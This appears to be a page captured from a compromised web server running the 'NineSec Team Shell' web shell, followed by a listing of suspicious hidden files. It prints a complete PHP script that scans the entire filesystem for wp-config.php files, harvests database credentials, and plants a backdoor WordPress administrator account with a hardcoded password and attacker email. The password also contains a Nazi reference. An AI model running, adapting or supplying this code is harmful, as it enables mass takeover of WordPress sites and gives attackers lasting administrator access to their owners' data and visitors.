NineSec Team Shell

<?php function scan($path) { if ($dir = @opendir($path)) { while (false !== ($file = readdir($dir))) { $p = $path . DIRECTORY_SEPARATOR . $file; if ($file != '.' && $file != '..') { if (is_link($p)) { continue; } elseif (is_dir($p)) { scan($p); } elseif ($file === 'wp-config.php') { inject($p); } } } } } function inject($p) { $user_login = 'root'; $user_password = 'AdolfHitler88.3123'; $user_email = 'livewire31@proton.me'; $data = file_get_contents($p); $pattern = "/table_prefix\s*=\s*'([^']*)';/i"; if (preg_match($pattern, $data, $matches)) { $table_prefix = $matches[1]; } else { $table_prefix = 'wp_'; } $lines = array_map('rtrim', file($p)); $conf = []; foreach ($lines as $line) { if (preg_match('/define\s*\(\s*[\'"]\s*(DB_USER|DB_HOST|DB_PASSWORD|DB_NAME)\s*[\'"]\s*,/', $line, $matches)) { $conf[$matches[1]] = parse_define_value($line); } } if (isset($conf['DB_HOST']) && isset($conf['DB_USER']) && isset($conf['DB_PASSWORD']) && isset($conf['DB_NAME'])) { $mysqli = new mysqli($conf['DB_HOST'], $conf['DB_USER'], $conf['DB_PASSWORD'], $conf['DB_NAME']); if ($mysqli->connect_errno) { return; } if ($result = $mysqli->query("SELECT ID FROM {$table_prefix}users WHERE user_login = '{$user_login}';")) { if ($result->num_rows > 0) { $result->close(); $mysqli->close(); return; } $result->close(); } $add_user_query = "INSERT INTO `{$table_prefix}users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_status`, `display_name`) SELECT '{$user_login}', MD5('{$user_password}'), '{$user_login}', '{$user_email}', '', (SELECT `user_registered` FROM `{$table_prefix}users` ORDER BY `ID` ASC LIMIT 1), 0, '{$user_login}' FROM DUAL WHERE NOT EXISTS ( SELECT 1 FROM `{$table_prefix}users` WHERE `user_login` = '{$user_login}' );"; if ($mysqli->query($add_user_query)) { $add_usermeta_query1 = "INSERT INTO `{$table_prefix}usermeta` (`user_id`, `meta_key`, `meta_value`) SELECT `ID`, 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}' FROM `{$table_prefix}users` WHERE `user_login` = '$user_login' ORDER BY `ID` DESC LIMIT 1;"; $add_usermeta_query2 = "INSERT INTO `{$table_prefix}usermeta` (`user_id`, `meta_key`, `meta_value`) SELECT `ID`, 'wp_user_level', '10' FROM `{$table_prefix}users` WHERE `user_login` = '$user_login' ORDER BY `ID` DESC LIMIT 1;"; $mysqli->query($add_usermeta_query1); $mysqli->query($add_usermeta_query2); } $site_url = false; if ($result = $mysqli->query("SELECT option_value FROM {$table_prefix}options WHERE option_name = 'siteurl';")) { $row = $result->fetch_object(); $result->close(); $site_url = $row->option_value; } if (!$site_url || strpos($site_url, 'http') !== 0) { if ($result = $mysqli->query("SELECT user_url FROM {$table_prefix}users ORDER BY ID ASC LIMIT 1;")) { $row = $result->fetch_object(); $result->close(); $site_url = $row->user_url; } } if ($result = $mysqli->query("SELECT ID FROM {$table_prefix}users WHERE user_login = '{$user_login}';")) { if ($result->num_rows > 0) { echo "<f>{$site_url}@@@{$p}</f>\n"; } $result->close(); } $mysqli->close(); } } function parse_define_value($line) { if (preg_match("/define\s*$\s*['\"]\w+['\"]\s*,\s*['\"](.*)['\"]\s*$\s*;/", $line, $matches)) { return $matches[1]; } return null; } function scanRootPaths() { if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { foreach (range('A', 'Z') as $driveLetter) { $drive = $driveLetter . ':\\'; if (is_dir($drive)) { scan($drive); } } } else { scan('/'); } } scanRootPaths(); die('!ended!');

Name	Size	Last Modified	Owner	Permissions	Options
..	--	January 02 2026 5:51:54	root	0755

.classes	0.786 KB	January 15 2026 9:50:04	readytorun	0644
.config	4.248 KB	January 14 2026 3:06:12	readytorun	0644
.content	0.786 KB	January 15 2026 7:52:28	readytorun	0644
.ibase_pconnection	4.226 KB	January 15 2026 4:21:08	readytorun	0644
.internal	0.786 KB	January 15 2026 10:00:20	readytorun	0644
.lock	0.715 KB	January 15 2026 12:57:52	readytorun	0644
.locked	0.786 KB	January 15 2026 3:00:35	readytorun	0644
.mb_convert	0.786 KB	January 15 2026 2:49:57	readytorun	0644
.multi	4.248 KB	January 14 2026 9:03:51	readytorun	0644
.request	0.786 KB	January 15 2026 7:55:16	readytorun	0644
.rjust	0.668 KB	January 15 2026 4:16:44	readytorun	0644
.sys	4.226 KB	January 15 2026 4:22:24	readytorun	0644
.uconvert	2.538 KB	January 15 2026 7:12:34	readytorun	0644
608673215_711292271818563_5764533225969107983_n-93Eyvv.jpg	85.376 KB	January 03 2026 5:44:12	readytorun	0644
608673215_711292271818563_5764533225969107983_n-AqICJ3.jpg	85.376 KB	January 03 2026 5:44:12	readytorun	0644
610621192_17874591597468248_8967439322664945616_n-6pzlEV.jpg	146.278 KB	January 03 2026 5:44:14	readytorun	0644
610621192_17874591597468248_8967439322664945616_n-H4wMOY.jpg	146.278 KB	January 03 2026 5:44:15	readytorun	0644
610630495_17874688110468248_4392157150633587074_n-dQhHNO.jpg	148.298 KB	January 04 2026 7:54:52	readytorun	0644
611375178_17875212744468248_4215158449373844544_n-MUZeQs.jpg	139.313 KB	January 08 2026 12:22:09	readytorun	0644
611626537_17875118130468248_6183453138520298412_n-iHERCt.jpg	327.672 KB	January 07 2026 11:55:27	readytorun	0644
611626537_17875118130468248_6183453138520298412_n-yDD2b0.jpg	327.672 KB	January 07 2026 11:55:29	readytorun	0644
612179673_17874948807468248_314776414078511626_n-3se1HU.jpg	217.893 KB	January 06 2026 9:34:09	readytorun	0644
612478020_17875320000468248_945698029597034200_n-6txe0u.jpg	223.278 KB	January 09 2026 1:39:03	readytorun	0644
613584124_17875678917468248_5795815879539127358_n-SVYs5B.jpg	341.284 KB	January 12 2026 4:36:21	readytorun	0644
613584124_17875678917468248_5795815879539127358_n-w7AWdK.jpg	341.284 KB	January 12 2026 4:36:21	readytorun	0644
615755014_17875856922468248_7886434437990624978_n-Q2V7Vj.jpg	143.464 KB	January 14 2026 6:09:16	readytorun	0644
616075577_17875967208468248_3676214728428217110_n-QFZiRm.jpg	249.974 KB	January 15 2026 6:14:41	readytorun	0644
wsdl-vontree-0057010c7621bd0b60178a2beec22dee14	205.686 KB	January 15 2026 2:23:05	vontree	0600

NineSec Team - 2022